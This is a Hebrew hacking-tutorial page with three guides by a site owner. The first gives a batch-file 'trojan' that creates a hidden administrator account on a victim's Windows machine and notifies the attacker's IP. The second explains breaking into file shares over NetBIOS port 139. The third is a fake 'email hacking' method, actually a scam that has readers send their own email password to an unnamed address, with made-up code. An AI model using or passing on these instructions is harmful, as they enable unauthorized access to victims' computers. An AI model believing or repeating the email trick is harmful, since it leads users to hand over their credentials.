|
(התוכן המוצג כאן מיעד למטרות לימוד בלבד ואין להשתמש בו, המערכת אינה אחראית לכל נזק שיגרם ע"י קריאת טקסט זה או שימוש בו )
האקינג
היום נדבר על האקינג!
מה זה האקינג?
האקינג הוא בעצם פריצה לרשתות ממוחשבות למחשבים ולכל מיני מערכות אחרות.
יש המשתמשים בידע שלהם לצורך פעולות בלתי חוקיות כגון גניבת זהויות גניבות אשראי
ולעומת זאת ישנם האקרים שמשתמשים בידע שלהם כדי לגלות חורי אבטחה למיניהם.
מה אני צריך כדי לפרוץ למחשב?
כדי לפרוץ למחשב אתם צריכים שיהיה במחשב של הקרבן פורט פתוח יש טרויאנים שפותחים פורטים
אבל ב-99% מהמקרים האנטי וירוס מגלה את הטרויאן אז עדיף שיהיה פורט פתוח על המחשב
זאת אומרת שאם יש לקרבן תוכנת קאזה או אימיול או תוכנת שיתופים אחרת אז חייב להיות לו איזשהו
פורט פתוח. עכשיו אנחנו צריכים לדעת איזה פורט פתוח (ב-98% מהמקרים יש פורט פתוח)
אז יש תוכנות שסורקות אייפי וגם מגלות לאיזה מחשב יש פורט פתוח
להורדת התוכנה אליסרבר
מדריך יצירת טרויאן!
שום אנטי וירוס לא יגלה את זה!!!
איך זה עובד?
אנחנו נעשה כאן קובץ ששום אנטי וירוס לא יגלה אותו!!!
בקובץ יהיה מספר פקודות שיפתחו משתמש חדש ואנחנו
נתחבר למשתמש החדש על ידי קליינט(אתה) שנכנס לסרבר(הקרבן).
איזה סוג קובץ זה?
הקובץ הינו קובץ שמריץ פקודות מערכת והסיומת שלו היא .bat
מתחילים?
-----------------------------------סרבר-------------------------------
תפתחו את פנקס הרשימות של ווינדוס.
ותכתבו שם ככה:
@ECHO OFF
net user Admin /add
net localgroup Administrators /add "Admin"
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "Admin" /t REG_DWORD /d 00000000 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Messenger" /v Start /t REG_DWORD /d 00000002 /f
net start Messenger
net send YourIPHere First victim online!
exit
עכשיו תעשו שמירה בשם ותשמרו את הקובץ עם סיומת .bat ואל תשכחו למטה לשנות
את סוג הקובץ מטקסט לכל סוגי הקבצים אחרת זה לא יפעל!!
-----------------------------------קלינט--------------------------------
מה זה קליינט?
קליינט זה בעצם הפורץ שנכנס לסרבר (שרת).
מתחילים!
תפתחו פנקס רשימות של ווינדוס ותרשמו ככה:
פקודה א'
הסבר:
פקודה זו יוצרת קשר בין הקליינט (אתה) לסרבר (הקרבן).
איפה שכתוב xxx.xxx.xxx.xxx כתוב את האיי פי של הקרבן.
פקודה ב'
הסבר:
פקודה זו תפתח חלון אקספלורר שיתן לכם גישה לכון הקשיח של הקרבן.
תהנו!
נכתב ע"י י.ש. בעל האתר
מדריך פריצה דרך פורט 139
סקירה ראשונית
אוקיי, נתחיל בהסברים. פרוטוקול Netbios הוא פרוטוקול של מייקרוסופט כדי
שנוכל לעשות שיתופים לקבצים שלנו. שימוש בפרוטוקול Netbios דורש פתיחת
פורט, בדרך כלל פורט מספר 139. קיים באג קטן בנוגע לשיתוף הקבצים שנותן
לנו גישה מלאה לקבצים המשותפים. עכשיו, בואו נתחיל בקטע המעשי יותר, שזה
בעצם ההסבר על השיתופים. לכל מחשב בפרוטוקול Tcp Ip, שזה בעצם הפרוטוקול
הכי נפוץ באינטרנט, יש מספר אייפי (Ip, שזה קיצור של Internet Protocol).
מספר האייפי הוא מספר בן 32 סיביות (סיבית היא ספרה בינארית). התחביר של
האייפי הוא פשוט מאוד: ארבעה מספרים בין אפס למאתיים חמישים וחמש מופרדים
על ידי סימן הנקודה. האייפי החשוב ביותר הוא אייפי 127.0.0.1, שזהו בעצם
כתובת Loopback: כל מה שנשלח לאייפי הזה יוחזר אלינו. עכשיו, דבר ראשון
שנצטרך הוא האייפי של הקורבן. אייפי של מישהו הוא לא משהו חסוי, אפשר
להשיג אייפי בקלות. עכשיו, אחרי שיש לנו את האייפי של הקורבן, אפשר לעבור
לחלק היותר מעשי.
איסוף אינפורמצייה
כמו בכל פריצה אמיתית, אנחנו נצטרך לאסוף אינפורמצייה מסויימת על הקורבן
שלנו. התחלנו מקודם בקבלת מספר האייפי, אבל צריך עוד אינפורמצייה. אנחנו
צריכים לבדוק אם פורט 139 פתוח אצלו, כי אם לא, אז לא נוכל לנצל את הבאג
בפרוטוקול Netbios. על מנת להשיג את האינפורמצייה הזאת, נשתמש בסריקה
בסיסית של פורטים. מצורף לגליון הקובץ NbtStat.exe, שאותו ניתן להריץ
דרך שורת הפקודה של Dos. קצת הסברים על סריקת פורטים: סורק הפורטים עושה
לנו אוטומאטית את מה שאנחנו יכולים לעשות ידנית, וכך חוסך זמן. הרעיון
בסורק הפורטים הוא שליחת בקשה דרך פורט נבחר (הפורט הנבחר הוא בדרך כלל
פורט אחד מתוך רשימה של פורטים) לאייפי קבוע. אם האייפי הגיב, זאת אומרת
שהפורט שבדקנו פתוח על המחשב שלו. עכשיו, כשאנחנו מבינים טוב יותר איך
סריקת פורטים עובדת, אפשר להמשיך. כעת, נפתח את שורת הפקודה, ונכתוב את
הפקודה הבאה: NbtStat -A 127.0.0.1, כאשר 127.0.0.1 הוא מספר האייפי של
הקורבן שלנו. אם קיבלנו אחרי ההרצה פלט של Host Not Found, אז או שהאייפי
לא נכון, או שאתם לא מחוברים לרשת, או שהמחשב של הקורבן לא מגיב לכם.
עכשיו, הפלט שאנחנו נקבל הוא בעצם טבלת נתונים של שמות המחשבים באייפי של
הקורבן. הטבלה עם שלוש עמודות: שם (Name), סוג (Type), ומצב (Status). מה
שמעניין אותנו זה המספר שנמצא בסוגריים משולשות בין השם לבין הסוג. מספר
זה מציין אם למחשב יש את היכולת לשתף קבצים. אם המספר הוא 20, אז אנחנו
יכולים להמשיך, אם לא אז אין לו שיתופים במחשב. להמחשה יותר טובה, אני
מציג כאן פלט של סריקה רגילה (הסריקה לא אמיתית):
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
IHA <00> UNIQUE Registered
WWW <1D> GROUP Registered
K1N <20> UNIQUE Registered
NO <01> UNIQUE Registered
JOE <1E> GROUP Registered
MAC Address = 00-E0-28-A5-42-CC
הגדרות סופיות לפני הפריצה
עכשיו נצטרך לשנות קובץ מסויים במחשב שלנו על מנת שהבאג ינוצל. קיים קובץ
במערכות Windows שנקרא Hosts. לקובץ אין סיומת. בגרסאות 2000 ומעלה של
מערכת Windows, הקובץ צריך להיות במיקום C:\Windows\System32\Drivers\Etc
ובגרסאות ישנות יותר במיקום C:\Windows. אל תבהלו אם הקובץ לא קיים, יכול
להיות שתצטרכו ליצור אותו. אם הקובץ כבר קיים, תפתחו אותו עם עורך טקסט
רגיל (חשוב שזה יהיה Plain Text). אם הקובץ לא קיים, פשוט תפתחו עורך
טקסט רגיל, ותשמרו קובץ ריק בשם Hosts במיקום שבו הקובץ אמור להיות, לפי
גרסת Windows שלכם. עכשיו, התחביר של קובץ Hosts הוא פשוט מאוד: אייפי,
ואחריו שם המחשב, מופרדים באמצעות רווח. אתם יכולים לכתוב הערות בתוך
קובץ Hosts, פשוט תתחילו עם סימן הסולמית ואחריו ההערה. בתור המשך לטבלה
שהוצגה כאן מקודם, נציג גם קובץ Hosts:
# This is just a remark
127.0.0.1 localhost
102.4.3.3 K1N
עכשיו, אחרי שהכנסנו את השם ושמרנו את הקובץ, אנחנו יכולים לעשות את כל
הפריצה. בואו נמשיך...
הפריצה עצמה
עכשיו, כל מה שצריך לעשות הוא לעשות חיפוש מחשב. כל מה שצריך לעשות הוא
ללחוץ על תפריט Start, תפריט Search, ואז על Find Computer. עכשיו, לכתוב
את האייפי בתיבת הטקסט, ולחפש. יכול להיות שזה ייקח קצת זמן, אבל עכשיו
ייעלה לכם ציור של מחשב ברשימה. תלחצו עליו פעמיים. אם אתם מקבלים בקשה
לסיסמא, אז זה די חבל, צריך לפרוץ אותה, אבל אם לא, אתם יכולים למחוק,
להעלות, להוריד ולערוך קבצים על המחשב של הקורבן.
סוף דבר
אוקיי, היום למדנו על שימוש בחולשה של פרוטוקול משומש מאוד. אני ממליץ
לכולם לחקור קצת על הנושא, יש עוד המון דברים שאפשר ללמוד עליהם. אני
מקווה שקיבלתם הרבה ידע בטקסט הזה.
מדריך פריצה לאימייל!
עובד 94%
איך פורצים לאימייל מכל סוג?
מצרכים
1. תיבת אימייל (כמה יותר ישן ככה יותר טוב, עדיף לא לנסות מתחת ל8 חודשים).
2. לדעת לעשות העתק הדבק ולכתוב.
מתחילים?
תפתחו את תיבת האימייל שלכם (זכרו אימייל ישן עדיף).
ותפתחו הודעה חדשה
ובנמען של האימייל תכתבו כך:
ובשורה של הנושא תכתבו כך:
hack the password
ועכשיו תגשו לתוכן ההודעה.
ובשורה הראשונה תכתבו את האימייל שלכם.
ועכשיו תרדו עוד שורה
ועוד אחת ותכתבו את הסיסמא של האיימיל שלכם
(אף אחד לא יראה אותה את שולחים למענה אוטומטי)
ועשיו יורדים עוד שורה ושם תכתבו בדיוק מה שכתוב כאן:
<hack these passord="fuck the password%20">
%25="java 2007"
<10x hackerteam_password>
במקום ה 2007 יש לרשום את השנה שבה רשמתם את האימייל שלכם.
ועכשיו החלק החשוב ביותר
מתי אני יקבל את הסיסמא?
לאחר 3-4 ימים תקבל את הסיסמא באימייל
וזכרו ככל שהאימייל שלכם ישן יותר אחוזי ההצלחה גבוהים יותר
והסיסמא תגיע מהר יותר.
ולאלה שעדיין לא הבינו ניתן דוגמא:
נושא: hack the password
תוכן ההודעה:
-------------------------------------------------------------------------------
my password
<hack these passord="fuck the password%20">
%25="java 2005"
<10x hackerteam_password>
------------------------------------------------------------------------------
(זכרו איפה שכתוב 2005 שנו לזמן ההרשמה שלכם).
נכתב על ידי י.ש. בעל האתר
| 
